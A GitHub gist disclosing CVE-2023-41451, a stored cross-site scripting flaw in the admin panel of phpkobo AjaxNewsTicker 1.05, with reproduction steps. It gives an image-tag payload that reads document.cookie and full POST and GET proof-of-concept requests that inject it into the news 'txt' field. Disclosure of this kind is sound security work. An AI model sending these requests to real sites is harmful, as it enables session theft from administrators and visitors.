Skip to content

Instantly share code, notes, and snippets.

Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save RNPG/062cfca2e293a0e7d24f5d55f8db3fde to your computer and use it in GitHub Desktop.
Save RNPG/062cfca2e293a0e7d24f5d55f8db3fde to your computer and use it in GitHub Desktop.
CVE-2023-41451
Vulnerability Type: Cross Site Scripting (XSS) Vulnerability
Vendor of Product: phpkobo
Affected Product Code Base: AjaxNewsTicker
Product Version: 1.05
Description: Cross Site Scripting vulnerability in phpkobo AjaxNewTicker v.1.0.5 allows a remote attacker to execute arbitrary code via a crafted payload inside the "txt" parameter value in "save news" in the index.php component.
Attack Vectors: To exploit this vulnerability the victim must click on the malicious news link stored in target and then the payload will be executed on the victim's browser.
Attack Type: Remote
Payload: <img src=0 onerror=alert(document.cookie)>
Assigned CVE-ID: CVE-2023-41451
Discoverer: Pedram Khazaei, Raspina Net Pars Group (RNPG Ltd.)
Steps To Reproduce
1. Browse the following URL: https://<target.xyz>/ntic/admin/index.php?_rtp=nticker&_be=1
2. Add "news
3. Insert some "title" for newly added "news"
4. Add some text to the news
5. Insert payload in "news text"
6. Save the "news"
7. View new saved news
8. You can create your malicious payload and send the crafted malicious link to the victim in order to be executed on his/her browser.
#PoC [POST method]
POST /ntic/admin/index.php?_rtp=nticker&_be=1 HTTP/1.1
Host: localhost:2222
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0
Accept: application/json,text/javascript, */*;q=0.01,
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
requ=%7b%22cmd%22%3a%22edit_done%22%2c%22id%22%3a%223524%22%2c%22form%22%3a%7b%22title%22%3a%22test_rnpg50%22%2c%22news%22%3a%5b%7b%22txt%22%3a%22%3cimg%20src%3d0%20onerror%3dalert(document.cookie)%3e%22%7d%5d%2c%22t_movein%22%3a%221000%22%2c%22t_pause%22%3a%222000%22%2c%22speed_moveout%22%3a%22100%22%2c%22fc_news%22%3a%22%22%2c%22bc_news%22%3a%22%23FFFFFF%22%2c%22fc_btn%22%3a%22%23E0E0E0%22%2c%22bc_btn%22%3a%22%23404040%22%2c%22rc_ctar%22%3a%22%23404040%22%2c%22notes%22%3a%22%22%2c%22pinidx%22%3a0%7d%7d
PoC [GET method]
GET /ntic/admin/index.php?_rtp=nticker&_be=1&requ=%7b%22cmd%22%3a%22edit_done%22%2c%22id%22%3a%223524%22%2c%22form%22%3a%7b%22title%22%3a%22test_rnpg50%22%2c%22news%22%3a%5b%7b%22txt%22%3a%22%3cimg%20src%3d0%20onerror%3dalert(document.cookie)%3e%22%7d%5d%2c%22t_movein%22%3a%221000%22%2c%22t_pause%22%3a%222000%22%2c%22speed_moveout%22%3a%22100%22%2c%22fc_news%22%3a%22%22%2c%22bc_news%22%3a%22%23FFFFFF%22%2c%22fc_btn%22%3a%22%23E0E0E0%22%2c%22bc_btn%22%3a%22%23404040%22%2c%22rc_ctar%22%3a%22%23404040%22%2c%22notes%22%3a%22%22%2c%22pinidx%22%3a0%7d%7d HTTP/1.1
Host: localhost:2222
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0
Accept: application/json,text/javascript, */*;q=0.01,
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment